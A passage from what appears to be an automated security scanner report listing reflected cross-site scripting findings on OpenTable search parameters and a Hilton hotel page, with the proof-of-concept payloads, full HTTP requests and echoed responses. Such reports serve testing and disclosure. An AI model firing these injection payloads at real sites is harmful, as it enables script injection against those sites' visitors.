Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod579ed';alert(1)//e3acda3f130&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new H
...[SNIP]...
4.69. http://www.opentable.com/opentables.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad25'%3balert(1)//adac89be721 was submitted in the t parameter. This input was echoed as cad25';alert(1)//adac89be721 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=singlecad25'%3balert(1)//adac89be721&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a56&p1q=rid%3d20076a25%2500%250d%250aadc5f31fe0d%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
'7:00 PM';
ResultProperties.Request.PartySize = 2;
ResultProperties.Request.Action = '';
ResultProperties.Request.DateTime = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Request.SearchType = 'singlecad25';alert(1)//adac89be721';
ResultProperties.Request.SearchDate = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Response.ResultsType = 5;
ResultProperties.Response.IsWhiteLabelRestRefSearch = true;
ResultProperties.Response.
...[SNIP]...
4.70. http://www.opentable.com/restaurant-search.aspx [PartySize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the PartySize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe644'%3balert(1)//a056217db90 was submitted in the PartySize parameter. This input was echoed as fe644';alert(1)//a056217db90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2fe644'%3balert(1)//a056217db90&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a48&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=6&vbefreg=6&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2fe644';alert(1)//a056217db90&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...
4.71. http://www.opentable.com/restaurant-search.aspx [ResTime parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the ResTime request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78f59'%3balert(1)//1463aa4e794 was submitted in the ResTime parameter. This input was echoed as 78f59';alert(1)//1463aa4e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM78f59'%3balert(1)//1463aa4e794&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a47; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=19&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM78f59';alert(1)//1463aa4e794&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...
4.72. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91473"><img%20src%3da%20onerror%3dalert(1)>34ec6dc532f was submitted in the REST URL parameter 4. This input was echoed as 91473"><img src=a onerror=alert(1)>34ec6dc532f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts91473"><img%20src%3da%20onerror%3dalert(1)>34ec6dc532f/accommodations.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:46 GMT;path=/
Content-Length: 55438


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts91473"><img src=a onerror=alert(1)>34ec6dc532f/accommodations.do" class="languageLink">
...[SNIP]...
